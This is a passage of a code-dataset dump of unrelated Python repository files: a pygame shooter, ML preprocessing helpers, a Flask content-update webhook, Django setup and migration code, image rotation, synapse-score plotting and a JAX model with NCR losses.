#print(len(self.aliens))\n\n # Redraw the screen last\n self._update_screen()\n\n def _check_events(self):\n \"\"\"Respond to keyboard and mouse for input events\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n self._check_keydown_events(event)\n elif event.type == pygame.KEYUP:\n self._check_keyup_events(event)\n elif event.type == pygame.MOUSEBUTTONDOWN:\n mouse_pos = pygame.mouse.get_pos()\n self._check_play_button(mouse_pos)\n\n def _check_keydown_events(self, event):\n if event.key == pygame.K_RIGHT:\n self.ship.moving_right = True\n elif event.key == pygame.K_LEFT:\n self.ship.moving_left = True\n # end game if 'q' or esc is pressed *** critical in full screen mode\n elif event.key == pygame.K_q or event.key == pygame.K_ESCAPE:\n sys.exit()\n elif event.key == pygame.K_SPACE:\n self._fire_bullet()\n elif event.key == pygame.K_p:\n self._start_new_game()\n\n def _check_keyup_events(self, event):\n if event.key == pygame.K_RIGHT:\n self.ship.moving_right = False\n elif event.key == pygame.K_LEFT:\n self.ship.moving_left = False\n\n def _update_screen(self):\n \"\"\" Update images and flip the screen \"\"\"\n self.screen.fill(self.settings.bg_color)\n self.ship.blit()\n for bullet in self.bullets.sprites():\n bullet.draw_bullet()\n\n self.aliens.draw(self.screen)\n\n self.sb.show_score()\n\n if not self.stats.game_active:\n self.play_button.draw_button()\n\n # Make the most recently drawn screen visible\n pygame.display.flip()\n\n def _update_bullets(self):\n # positions bullets\n self.bullets.update()\n\n # get ride of bullets off screen\n for bullet in self.bullets.copy():\n if bullet.rect.bottom <= 0:\n self.bullets.remove(bullet)\n # print(len(self.bullets))\n\n self._check_bullet_alien_collisions()\n\n def _repopulate_aliens(self):\n # no aliens left so repopulate. clear bullets and re create fleet\n if not self.aliens or len(self.aliens) == 0:\n self.settings.increase_speed()\n self.stats.level += 1\n self.sb.prep_level()\n self._reset_fleet()\n\n def _check_bullet_alien_collisions(self):\n # Check if bullet hit alien and remove them\n collisions = pygame.sprite.groupcollide(self.bullets, self.aliens, True, True)\n if collisions:\n self.pop_sound.play()\n for aliens in collisions.values():\n self.stats.score += self.settings.alien_points * len(aliens)\n self.sb.prep_score()\n self.sb.check_high_score()\n\n # if no aliens left so repopulate. clear bullets and re create fleet\n if not self.aliens or len(self.aliens) == 0:\n self._repopulate_aliens()\n\n def _fire_bullet(self):\n if len(self.bullets) < self.settings.bullets_allowed:\n new_bullet = Bullet(self)\n self.bullets.add(new_bullet)\n self.gun_sound.play()\n\n def _create_fleet(self):\n if not self.aliens or len(self.aliens) == 0:\n alien = Alien(self)\n alien_width, alien_height = alien.rect.size\n available_space_x = self.settings.screen_width - (2 * alien_width)\n number_aliens_x = available_space_x // (2 * alien_width) # // floor division\n\n ship_height = self.ship.rect.height\n available_space_y = (self.settings.screen_height - (3 * alien_height) - ship_height)\n number_rows = available_space_y // (2 * alien_height)\n\n # create the first row of aliens\n for row_number in range(number_rows):\n for alien_number in range(number_aliens_x):\n self._create_alien(alien_number, row_number)\n\n print(f\"create fleet {len(self.aliens)}\")\n\n def _create_alien(self, alien_number, row_number):\n alien = Alien(self)\n alien_width, alien_height = alien.rect.size\n alien.x = alien_width + 2 * alien_width * alien_number\n alien.rect.x = alien.x\n alien.rect.y = alien.rect.height + 2 * alien.rect.height * row_number\n self.aliens.add(alien)\n\n def _update_aliens(self):\n \"\"\"\n Check if fleet hit a screen edge then\n Update the position of the alien fleet\n \"\"\"\n self._check_fleet_edges()\n self.aliens.update()\n\n # look for alien and ship collisions\n if pygame.sprite.spritecollideany(self.ship, self.aliens):\n self._ship_hit()\n\n # aliens landed\n self._check_aliens_bottom()\n\n def _check_fleet_edges(self):\n for alien in self.aliens.sprites():\n if alien.check_edges():\n self._change_fleet_direction()\n break\n\n def _change_fleet_direction(self):\n self.beam_sound.play()\n for alien in self.aliens.sprites():\n alien.rect.y += self.settings.fleet_drop_speed\n self.settings.fleet_direction *= -1\n\n\n def _reset_fleet(self):\n #print('reset')\n self.aliens.empty()\n self.bullets.empty()\n\n self._create_fleet()\n self.ship.center_ship()\n\n def _ship_hit(self):\n self.crash_sound.play()\n if self.stats.ships_left > 0:\n self.stats.ships_left -= 1\n self.sb.prep_ships()\n self._reset_fleet()\n # pause\n sleep(2.0)\n else:\n self.stats.game_active = False\n pygame.mouse.set_visible(True)\n\n def _start_new_game(self):\n if not self.stats.game_active:\n self.stats.game_active = True\n\n # Reset game\n self.stats.reset_stats()\n self.sb.prep_score()\n self.sb.prep_high_score()\n self.sb.prep_level()\n self.sb.prep_ships()\n self.settings.initialize_dynamic_settings()\n self._reset_fleet()\n\n # Hide mouse cursor\n pygame.mouse.set_visible(False)\n\n def _check_aliens_bottom(self):\n screen_rect = self.screen.get_rect()\n for alien in self.aliens.sprites():\n if alien.rect.bottom >= screen_rect.bottom:\n self._ship_hit()\n break\n\n def _check_play_button(self, mouse_pos):\n button_clicked = self.play_button.rect.collidepoint(mouse_pos)\n if button_clicked and not self.stats.game_active:\n self._start_new_game()\n\n\nif __name__ == '__main__':\n # make an instance of the game and run it\n ai = AlienInvasion()\n ai.run_game()\n\n\n","repo_name":"volleyballfantic2/projects","sub_path":"python/PycharmProjects/alien_invasion/alien_invasion.py","file_name":"alien_invasion.py","file_ext":"py","file_size_in_byte":8756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16758356502","text":"#python-how-to-import-other-python-files\n#https://stackoverflow.com/questions/2349991/python-how-to-import-other-python-files\n\n#python tab/space\n#http://blog.csdn.net/u012996583/article/details/36896705\n\nimport os\nimport pandas as pd\nimport pandas\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pylab\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation\nfrom sklearn.preprocessing import normalize\nfrom sklearn import preprocessing\nfrom keras.utils import np_utils\n\ndef numpy_test():\n\t#a=np.array([0,1,2,3])\n\tarr = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])\n\tnp.delete(arr, np.s_[::2], 1)\n\tprint(np.shape)\n\ndef Initial_train_test(Ini_datapath, date, broken_feature):\n from os import path\n #Read Initial Data\n trainDataPath = path.join(os.path.abspath(Ini_datapath), 'stock_train_data_2017'+date+'.csv')\n testDataPath = path.join(os.path.abspath(Ini_datapath), 'stock_test_data_2017'+date+'.csv')\n train_ini_00 = pd.read_csv(trainDataPath, sep=',', delimiter=None)\n test_ini_00 = pd.read_csv(testDataPath, sep=',', delimiter=None)\n\n #Deal with Broken Feature (這幾期主辦單位給的feature有少)\n temp_str='feature'+str(broken_feature)\n train_ini_00[temp_str]=np.zeros(len(train_ini_00))\n test_ini_00[temp_str]=np.zeros(len(test_ini_00))\n\n #normalize feature\n train_ini=train_ini_00.copy(deep=True)\n test_ini=test_ini_00.copy(deep=True)\n for i in range(1,89,1):\n train_ini.iloc[:,i]=preprocessing.scale(train_ini.iloc[:,i])\n test_ini.iloc[:,i]=preprocessing.scale(test_ini.iloc[:,i]) \n\n #shift group number [1,28]->[0,27]\n test_ini['group']=test_ini['group']-1\n train_ini['group']=train_ini['group']-1\n\n #DataFrame to matrix\n train_array_ini=pd.DataFrame.as_matrix(train_ini)\n test_array_ini=pd.DataFrame.as_matrix(test_ini)\n\n ##remove useless column\n train_array=train_array_ini.copy()\n test_array=test_array_ini.copy()\n train_array=np.delete(train_array, np.s_[89:93], 1)\n train_array=np.delete(train_array, 0, 1)\n test_array=np.delete(test_array, 89, 1)\n test_array=np.delete(test_array, 0, 1)\n\n #Fill Broken Feature with ID\n for i in range(0,train_array.shape[0],1):\n train_array[i,43]=i\n for i in range(0,test_array.shape[0],1):\n test_array[i,43]=i+test_array.shape[0] \n CAT_Array=np.concatenate((train_array, test_array), axis=0)\n CAT_Array=preprocessing.scale(CAT_Array)\n\n ##onehot encode (group)\n group_test_OneHot = np_utils.to_categorical(test_ini['group'], num_classes=max(test_ini['group'])+1)\n group_train_OneHot = np_utils.to_categorical(train_ini['group'], num_classes=max(train_ini['group'])+1)\t\n\n CAT_GroupOneHot=np.concatenate((group_train_OneHot, group_test_OneHot), axis=0)\n CAT_GroupOneHot=preprocessing.scale(CAT_GroupOneHot)\n #XTrain=CAT[0:train_array1.shape[0],:]\n #XTest=CAT[train_array1.shape[0]:train_array1.shape[0]+test_array1.shape[0],:]\n\n ##combine array and onehot\n CAT=np.concatenate((CAT_Array, CAT_GroupOneHot), axis=1)\n XTrain=CAT[0:train_array1.shape[0],:]\n XTest=CAT[train_array1.shape[0]:train_array1.shape[0]+test_array1.shape[0],:]\n\n ##save preprocessing-data\n np.save('Xtrain', XTrain)\n #np.save('Xtrain', train_array_ini)\n np.save('Xtest', XTest)\n #np.save('Xtest', test_array_ini)\n np.save('Ytrain',pd.DataFrame.as_matrix(train_ini_00['label']))\n\ndef hi():\n\tprint(\"hello/n\")\n\t\ndef show_train_history(train_history,train,validation):\n\t#plot train history(with accuracy,loss)\n\tplt.plot(train_history.history[train])\n\tplt.plot(train_history.history[validation])\n\tplt.title('Train History')\n\tplt.ylabel(train)\n\tplt.xlabel('Epoch')\n\tplt.legend(['train','validation'], loc='upper left')\n\tplt.show()\t\n\t\t\t\n\t#Show Image\n\tfrom PIL import Image\n\tfile = Image.open(\"img.png\")\n\ndef my_onehot(t):\n\tfrom numpy import array\n\tfrom numpy import argmax\n\tfrom keras.utils import to_categorical\n\timport pandas as pd\n\t# define example\n\tdata = t\n\tdata = array(data)\n\t#print(data)\n\t# one hot encode\n\tencoded = to_categorical(data)\n\t#print(encoded)\n\t# invert encoding\n\tinverted = argmax(encoded[0])\n\t#print(inverted)\n\treturn encoded\n \ndef KNN_K1(Xtrain,Ytrian,Xtest,err,Name):\n\tfrom sklearn.neighbors.nearest_centroid import NearestCentroid\n\tclf = NearestCentroid()\n\tclf.fit(Xtrain, Ytrian)\n\ta=clf.predict(Xtest)\n\tresult = pd.read_csv(\"./upload\"+\".csv\", sep=',', delimiter=None)\n\t\n\tresult['proba']=a*(1.0-err[0])+(1-a)*err[1]\n\tresult.to_csv(Name[0]+str(Name[1])+\".csv\", sep=',', encoding='utf-8', index=False)\n","repo_name":"good5dog5/AI-Challenge","sub_path":"KNN/Stochastic_w6_1016_v5.0/myread.py","file_name":"myread.py","file_ext":"py","file_size_in_byte":4713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17663667996","text":"def copy_file(oldfile,newfile):\n\toldFile=open(oldfile,\"r\")\n\tnewFile=open(newfile,\"w\")\n\twhile True:\n\t\tfileContent=oldFile.read(50)\n\t\tif fileContent==\"\":\n\t\t\tbreak\n\t\tnewFile.write(fileContent)\n\toldFile.close()\n\tnewFile.close()\n\treturn\ncopy_file(\"d:\\\\python\\\\hello.txt\",\"d:\\\\python\\\\hello2.txt\")\n\n\n\n\n\n","repo_name":"yuyuanye/std_python","sub_path":"somethingneed/Python游戏超详细实战攻略-案例源码/第1章 源码/1.3 文件的使用/5-6.py","file_name":"5-6.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15792514759","text":"import logging\n\nfrom flask import current_app, request, abort\nfrom flask.blueprints import Blueprint\n\nfrom sipa.utils.git_utils import update_repo\n\n\nlogger = logging.getLogger(__name__)\n\nbp_hooks = Blueprint('hooks', __name__, url_prefix='/hooks')\n\n\n@bp_hooks.route('/update-content', methods=['POST'])\ndef content_hook():\n auth_key = current_app.config.get('GIT_UPDATE_HOOK_TOKEN')\n\n if not auth_key:\n # no key configured (default) → feature not enabled\n abort(404)\n\n key = request.args.get('token')\n if not key:\n logger.debug(\"`update-content` called without Token\",\n extra={'data': {'request_args': request.args}})\n abort(401)\n\n if key != auth_key:\n logger.warning(\"`update-content` called with wrong Token\",\n extra={'data': {'request_args': request.args,\n 'auth_key': auth_key}})\n abort(403)\n\n logger.info(\"Update hook triggered. Fetching content.\")\n reload_necessary = update_repo(current_app.config['FLATPAGES_ROOT'])\n if reload_necessary:\n try:\n import uwsgi\n except ImportError:\n logger.debug(\"UWSGI not present, skipping reload\")\n pass\n else:\n logger.debug(\"Reloading UWSGI...\")\n uwsgi.reload()\n\n # 204: No content\n # https://en.wikipedia.org/wiki/List_of_HTTP_status_codes#204\n return \"\", 204\n","repo_name":"agdsn/sipa","sub_path":"sipa/blueprints/hooks.py","file_name":"hooks.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"39110381728","text":"from django.core.management.base import BaseCommand, CommandError\nfrom meals.models import College, Restaurant\n\nCOLLEGE_NAME = \"yonsei\"\nKUKJE_RESTAURANTS = [\"Y-플라자\", \"송도1학사\", \"송도2학사\"]\nSTUDENT_RESTAURANTS = [\"카페테리아(맛나샘)\", \"푸드코트(부를샘)\"]\nHANKYUNG_RESTAURANTS = [\"한경관(교직원식당)\"]\n\nclass Command(BaseCommand):\n help = 'Creates the neccessary university and restaurants for crawler'\n\n def handle(self, *args, **options):\n college, created = College.objects.get_or_create(name=COLLEGE_NAME)\n if created:\n self.stdout.write(self.style.SUCCESS('Successfully created \"%s\" university' % COLLEGE_NAME))\n else:\n self.stdout.write(self.style.WARNING('\"%s\" university already exists'))\n for name in KUKJE_RESTAURANTS + STUDENT_RESTAURANTS + HANKYUNG_RESTAURANTS:\n _, created = Restaurant.objects.get_or_create(name=name, college=college)\n if created:\n self.stdout.write(self.style.SUCCESS('Successfully created \"%s\" restaurant' % name))\n","repo_name":"beotborry/collegemeals","sub_path":"yonsei/management/commands/initialize_yonsei.py","file_name":"initialize_yonsei.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15055484280","text":"'''Rotation Program'''\r\ndef rotation(img, n):\r\n try:\r\n #This function rotates the image given 4 different degrees: 0 (a mirror), 90, 180, 270\r\n im2=[] #Creates an empty list that the new values can be sorted into\r\n if n==90:\r\n for i in range(0,len(img[0])): #creates the width of the new image using the height of the original\r\n new_row=[]\r\n for j in range(0,len(img)): #creates the height of the new image using the width of the original\r\n new_row.append(img[-j-1][i]) #\"rotates\" the image by transcribing the i and j values of the image's matrix and adds it to a list\r\n \r\n im2.append(new_row)\r\n \r\n return im2\r\n elif n==0:\r\n for i in range(0,len(img)):\r\n new_row=[]\r\n for j in range(0,len(img[0])): #Retains original height and width\r\n new_row.append(img[i-1][-j-1]) #Appends list by flipping the original i and j locations\r\n \r\n im2.append(new_row)\r\n \r\n return im2\r\n elif n==180:\r\n for i in range(0,len(img)):\r\n new_row=[]\r\n for j in range(0,len(img[0])): \r\n new_row.append(img[-i][-j]) #Flips i and j values by making them negative\r\n \r\n im2.append(new_row)\r\n \r\n return im2\r\n elif n==270:\r\n for i in range(0,len(img[0])):\r\n new_row=[]\r\n for j in range(0,len(img)):\r\n new_row.append(img[j][-i-1]) #is the opposite of a 90 degree rotation, where j is positive, and i is -i-1\r\n \r\n im2.append(new_row)\r\n \r\n return im2\r\n except:\r\n return False","repo_name":"AineshSootha/ImageProcessingPython","sub_path":"rotation.py","file_name":"rotation.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74220031468","text":"import json\nimport os\nimport numpy as np\nimport matplotlib.table as tab\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport matplotlib.lines as mlines\nfrom CNNectome.utils import config_loader\n\niterations = list(range(30000, 210000, 10000))\ncolors = {\n \"classic\": (62 / 255.0, 150 / 255.0, 81 / 255.0),\n \"lite\": (57 / 255.0, 106 / 255.0, 177 / 255.0),\n \"deluxe\": (218 / 255.0, 124 / 255.0, 48 / 255.0),\n \"data2016-aligned\": (218 / 255.0, 124 / 255.0, 48 / 255.0),\n \"data2016-unaligned\": (57 / 255.0, 106 / 255.0, 177 / 255.0),\n \"data2017-unaligned\": (62 / 255.0, 150 / 255.0, 81 / 255.0),\n \"data2017-aligned\": (204 / 255.0, 37 / 255.0, 41 / 255.0),\n}\nlinestyles = {\n \"data2017-aligned\": \"-\",\n \"data2017-unaligned\": \"--\",\n \"data2016-aligned\": \"-.\",\n \"data2016-unaligned\": \":\",\n}\n\n\ndef load_result(data_train, augmentation, data_eval, iteration, mode):\n result_json = os.path.join(\n config_loader.get_config()[\"synapses\"][\"training_setups_path\"],\n \"data_and_augmentations\",\n data_train,\n augmentation,\n \"evaluation\",\n str(iteration),\n data_eval,\n \"partners.{0:}.json\".format(mode),\n )\n try:\n with open(result_json, \"r\") as f:\n resdict = json.load(f)\n except IOError:\n return None\n return resdict\n\n\ndef compute_cremi_score(\n samples, data_train, augmentation, data_eval, iteration, mode, metric=\"fscore\"\n):\n result = load_result(data_train, augmentation, data_eval, iteration, mode)\n if result is None:\n return 1.0\n score = 0.0\n for s in samples:\n if result[s][metric] is not None:\n score += result[s][metric]\n else:\n score += 0.0\n score /= len(samples)\n return 1.0 - score\n\n\ndef plot_cremi_score_by_iteration(\n samples,\n data_train,\n augmentation,\n data_eval,\n metric=\"fscore\",\n color=(62 / 255.0, 150 / 255.0, 81 / 255.0),\n):\n training_cremi_scores = []\n validation_cremi_scores = []\n\n for i in iterations:\n training_cremi_scores.append(\n compute_cremi_score(\n samples,\n data_train,\n augmentation,\n data_eval,\n i,\n \"training\",\n metric=metric,\n )\n )\n validation_cremi_scores.append(\n compute_cremi_score(\n samples,\n data_train,\n augmentation,\n data_eval,\n i,\n \"validation\",\n metric=metric,\n )\n )\n minit_training = np.nanargmin(training_cremi_scores)\n minit_validation = np.nanargmin(validation_cremi_scores)\n plt.plot(\n iterations,\n training_cremi_scores,\n ls=\"--\",\n c=color,\n label=data_eval + \", training\",\n linewidth=0.5,\n )\n plt.plot(\n iterations[minit_training],\n training_cremi_scores[minit_training],\n c=color,\n marker=\"o\",\n alpha=0.5,\n )\n plt.plot(\n iterations,\n validation_cremi_scores,\n ls=\"-\",\n c=color,\n label=data_eval + \", validation\",\n )\n plt.plot(\n iterations[minit_validation],\n validation_cremi_scores[minit_validation],\n c=color,\n marker=\"o\",\n )\n plt.annotate(\n \"{0:.2f}\".format(validation_cremi_scores[minit_validation]),\n [iterations[minit_validation], validation_cremi_scores[minit_validation]],\n [4, -7],\n textcoords=\"offset points\",\n color=color,\n )\n\n plt.ylim([0.1, 1.0])\n plt.xlim([20000, 210000])\n\n plt.legend()\n plt.xlabel(\"iterations\")\n ylabel = \"CREMI score on \"\n for s in samples:\n ylabel += s\n if s != samples[-1]:\n ylabel += \", \"\n plt.ylabel(ylabel)\n\n\nif __name__ == \"__main__\":\n samples = [\"A\", \"B\", \"C\"]\n data_train = [\"data2017-aligned\", \"data2017-unaligned\"]\n data_eval = [\"data2017-aligned\", \"data2017-unaligned\"]\n for k, dt in enumerate(data_train):\n plt.subplot(\"\".join((\"2\", str(len(data_train)), str(k + 1))))\n plt.title(\"train on \" + dt)\n for de in data_eval:\n plot_cremi_score_by_iteration(samples, dt, \"deluxe\", de, color=colors[de])\n data_train = [\"data2016-aligned\", \"data2016-unaligned\"]\n data_eval = [\"data2016-aligned\", \"data2016-unaligned\"]\n for l, dt in enumerate(data_train):\n plt.subplot(\"\".join((\"2\", str(len(data_train)), str(k + l + 2))))\n plt.title(\"train on \" + dt)\n for de in data_eval:\n plot_cremi_score_by_iteration(samples, dt, \"deluxe\", de, color=colors[de])\n\n plt.show()\n","repo_name":"saalfeldlab/CNNectome","sub_path":"CNNectome/visualization/analysis_prepostscores.py","file_name":"analysis_prepostscores.py","file_ext":"py","file_size_in_byte":4706,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"24789050381","text":"\"\"\"Base model with NCR regularisation losses.\"\"\"\n\nimport functools\nfrom typing import Dict, Optional, Tuple, Union\n\nfrom flax.training import common_utils\nfrom immutabledict import immutabledict\nimport jax\nimport jax.numpy as jnp\nimport numpy as np\nfrom scenic.model_lib.base_models import base_model\nfrom scenic.model_lib.base_models import classification_model\nfrom scenic.model_lib.base_models import model_utils\nfrom scenic.projects.ncr import loss\n\nArray = Union[jnp.ndarray, np.ndarray]\n\n_CLASSIFICATION_METRICS = immutabledict({\n 'accuracy':\n (model_utils.weighted_correctly_classified, model_utils.num_examples),\n 'loss_xentropy': (model_utils.weighted_unnormalized_softmax_cross_entropy,\n model_utils.num_examples),\n})\n\n\nclass NCRModel(base_model.BaseModel):\n \"\"\"Abstract class for model with NCR losses.\n\n Supports both softmax-classification and multi-label classification models.\n \"\"\"\n\n def loss_function( # pytype: disable=signature-mismatch # overriding-return-type-checks\n self,\n logits: Array,\n batch: base_model.Batch,\n use_ncr: bool = False,\n use_bootstrap: bool = False,\n features: Optional[Array] = None,\n memory_logits: Optional[Array] = None,\n memory_features: Optional[Array] = None,\n loss_weight: Optional[float] = 0.0,\n model_params: Optional[Array] = None) -> Tuple[float, Dict[str, Array]]:\n\n if use_ncr:\n return self.ncr_loss(logits, batch, features, memory_logits,\n memory_features, loss_weight, model_params)\n else:\n return self.ce_loss(logits, batch, model_params, use_bootstrap,\n loss_weight)\n\n def ce_loss(\n self,\n logits: Array,\n batch: base_model.Batch,\n model_params: Optional[Array] = None,\n use_bootstrap: bool = False,\n loss_weight: Optional[float] = 1.0) -> Tuple[float, Dict[str, Array]]:\n \"\"\"Returns softmax cross entropy loss with an L2 penalty on the weights.\n\n Args:\n logits: Output of model in shape [batch, length, num_classes].\n batch: Batch of data that has 'label' and optionally 'batch_mask'.\n model_params: Parameters of the model, for optionally applying\n regularization.\n use_bootstrap: Enable the bootstrap loss term\n loss_weight: Weight for the bootstrap loss term\n\n Returns:\n Total loss.\n \"\"\"\n weights = batch.get('batch_mask')\n loss_metrics = {}\n\n if self.dataset_meta_data.get('target_is_onehot', False):\n one_hot_targets = batch['label']\n else:\n one_hot_targets = common_utils.onehot(batch['label'], logits.shape[-1])\n\n softmax_ce_loss = model_utils.weighted_softmax_cross_entropy(\n logits,\n one_hot_targets,\n weights,\n label_smoothing=self.config.get('label_smoothing'))\n loss_metrics['softmax_cross_entropy'] = softmax_ce_loss\n\n if self.config.get('l2_decay_factor') is None:\n total_loss = softmax_ce_loss\n else:\n l2_loss = model_utils.l2_regularization(model_params)\n total_loss = softmax_ce_loss + 0.5 * self.config.l2_decay_factor * l2_loss\n\n if use_bootstrap:\n bootstrap_labels = jax.nn.softmax(logits)\n bootstrap_loss = model_utils.weighted_softmax_cross_entropy(\n logits,\n bootstrap_labels,\n weights,\n label_smoothing=self.config.get('label_smoothing'))\n total_loss = (1.0 - loss_weight) * total_loss + (\n loss_weight * bootstrap_loss)\n\n # Add the dummy entry for the NCR loss\n loss_metrics['ncr_loss'] = 0.0\n loss_metrics['total_loss'] = total_loss\n\n return total_loss, loss_metrics # pytype: disable=bad-return-type # jax-ndarray\n\n def ncr_loss(\n self,\n logits: Array,\n batch: base_model.Batch,\n features: Array,\n batch_logits: Array,\n batch_features: Array,\n ncr_loss_weight: float,\n model_params: Optional[Array] = None) -> Tuple[float, Dict[str, Array]]:\n \"\"\"Returns softmax cross entropy loss with an L2 penalty on the weights.\n\n Args:\n logits: Output of model in shape [batch, length, num_classes].\n batch: Batch of data that has 'label' and optionally 'batch_mask'.\n features: Feature embeddings of batch inputs,\n batch_logits: Logits corresponding to the batch items to be queried from\n batch_features: Features corresponding to the batch items to be queried\n from\n ncr_loss_weight: The weight of the NCR loss term\n model_params: Parameters of the model, for optionally applying\n regularization.\n\n Returns:\n Total loss.\n \"\"\"\n weights = batch.get('batch_mask')\n loss_metrics = {}\n\n if self.dataset_meta_data.get('target_is_onehot', False):\n one_hot_targets = batch['label']\n else:\n one_hot_targets = common_utils.onehot(batch['label'], logits.shape[-1])\n\n softmax_ce_loss = model_utils.weighted_softmax_cross_entropy(\n logits,\n one_hot_targets,\n weights,\n label_smoothing=self.config.get('label_smoothing'))\n\n softmax_ce_loss = (1.0 - ncr_loss_weight) * softmax_ce_loss\n loss_metrics['softmax_cross_entropy'] = softmax_ce_loss\n if self.config.get('l2_decay_factor') is None:\n total_loss = softmax_ce_loss\n else:\n l2_loss = model_utils.l2_regularization(model_params)\n total_loss = softmax_ce_loss + 0.5 * self.config.l2_decay_factor * l2_loss\n\n # Add NCR loss\n ncr_loss = loss.ncr_loss(\n logits, features, batch_logits, batch_features,\n number_neighbours=self.config.ncr.number_neighbours,\n smoothing_gamma=self.config.ncr.smoothing_gamma,\n temperature=self.config.ncr.temperature,\n example_weights=weights)\n total_loss += ncr_loss_weight * ncr_loss\n loss_metrics['ncr_loss'] = ncr_loss\n loss_metrics['total_loss'] = total_loss\n\n return total_loss, loss_metrics # pytype: disable=bad-return-type # jax-ndarray\n\n def get_metrics_fn(self, split: Optional[str] = None) -> base_model.MetricFn:\n \"\"\"Returns a callable metric function for the model.\n\n Args:\n split: The split for which we calculate the metrics. It should be one of\n the ['train', 'validation', 'test'].\n Returns: A metric function with the following API: ```metrics_fn(logits,\n batch)```\n \"\"\"\n del split # For all splits, we return the same metric functions.\n\n return functools.partial(\n classification_model.classification_metrics_function,\n target_is_onehot=self.dataset_meta_data.get('target_is_onehot',\n False),\n metrics=_CLASSIFICATION_METRICS)\n","repo_name":"google-research/scenic","sub_path":"scenic/projects/ncr/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":6628,"program_lang":"python","lang":"en","doc_type":"code","stars":2619,"dataset":"github-code","pt":"37"} +{"seq_id":"71639380266","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Generated by Django 3.2.13 on 2022-09-06 09:57\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import migrations, models\n\nMODEL_TYPE = {\n \"adcm\": \"adcm\",\n \"cluster\": \"cluster\",\n \"clusterobject\": \"service\",\n \"servicecomponent\": \"component\",\n \"hostprovider\": \"provider\",\n \"host\": \"host\",\n}\n\n\ndef _get_host_action_context(apps, obj, task):\n Prototype = apps.get_model(\"cm\", \"Prototype\")\n ClusterObject = apps.get_model(\"cm\", \"ClusterObject\")\n ServiceComponent = apps.get_model(\"cm\", \"ServiceComponent\")\n cluster = obj.cluster\n context = {\"cluster\": {\"id\": cluster.pk, \"name\": cluster.name}}\n\n if task.action.prototype.type == \"service\":\n try:\n service_prototype = Prototype.objects.get(\n type=task.action.prototype.type,\n name=task.action.prototype.name,\n bundle=cluster.prototype.bundle,\n version=cluster.prototype.version,\n parent=None,\n )\n service = ClusterObject.objects.get(prototype=service_prototype, cluster=cluster)\n except ObjectDoesNotExist:\n context = {}\n else:\n context[\"service\"] = {\"id\": service.pk, \"name\": service.prototype.display_name}\n\n elif task.action.prototype.type == \"component\":\n try:\n service_prototype = Prototype.objects.get(\n type=task.action.prototype.parent.type,\n name=task.action.prototype.parent.name,\n bundle=cluster.prototype.bundle,\n version=cluster.prototype.version,\n parent=None,\n )\n service = ClusterObject.objects.get(prototype=service_prototype, cluster=cluster)\n component_prototype = Prototype.objects.get(\n type=task.action.prototype.type,\n name=task.action.prototype.name,\n bundle=cluster.prototype.bundle,\n version=cluster.prototype.version,\n parent=service_prototype,\n )\n component = ServiceComponent.objects.get(\n cluster=cluster,\n service=service,\n prototype=component_prototype,\n )\n except ObjectDoesNotExist:\n context = {}\n else:\n context[\"service\"] = {\"id\": service.pk, \"name\": service.prototype.display_name}\n context[\"component\"] = {\n \"id\": component.pk,\n \"name\": component.prototype.display_name,\n }\n return context\n\n\ndef _fix_selector(selector, _models):\n fixed_selector = {}\n for object_type, object_id in selector.items():\n model, name_attr = _models.get(object_type, (None, None))\n\n if not model:\n continue\n\n obj = model.objects.filter(pk=object_id).first()\n if not obj:\n continue\n\n if object_type in {\"service\", \"component\"}:\n obj = obj.prototype\n\n fixed_selector[object_type] = {\"id\": object_id, \"name\": getattr(obj, name_attr)}\n\n return fixed_selector\n\n\ndef get_selector(apps, schema_editor):\n TaskLog = apps.get_model(\"cm\", \"TaskLog\")\n\n _models = {\n \"adcm\": (apps.get_model(\"cm\", \"ADCM\"), \"name\"),\n \"cluster\": (apps.get_model(\"cm\", \"Cluster\"), \"name\"),\n \"service\": (apps.get_model(\"cm\", \"ClusterObject\"), \"display_name\"),\n \"component\": (apps.get_model(\"cm\", \"ServiceComponent\"), \"display_name\"),\n \"provider\": (apps.get_model(\"cm\", \"HostProvider\"), \"name\"),\n \"host\": (apps.get_model(\"cm\", \"Host\"), \"fqdn\"),\n }\n\n for task in TaskLog.objects.all():\n if task.selector:\n selector = _fix_selector(task.selector, _models)\n else:\n if not task.object_type:\n continue\n\n model, _ = _models.get(MODEL_TYPE[task.object_type.model], (None, None))\n\n if not model:\n continue\n\n obj = model.objects.filter(pk=task.object_id).first()\n if not obj:\n continue\n\n selector = {}\n\n if obj.prototype.type in {\"adcm\", \"cluster\", \"provider\"}:\n selector[obj.prototype.type] = {\"id\": obj.pk, \"name\": obj.name}\n elif obj.prototype.type == \"service\":\n selector[\"cluster\"] = {\"id\": obj.cluster.pk, \"name\": obj.cluster.name}\n selector[\"service\"] = {\"id\": obj.pk, \"name\": obj.prototype.display_name}\n elif obj.prototype.type == \"component\":\n selector[\"cluster\"] = {\"id\": obj.cluster.pk, \"name\": obj.cluster.name}\n 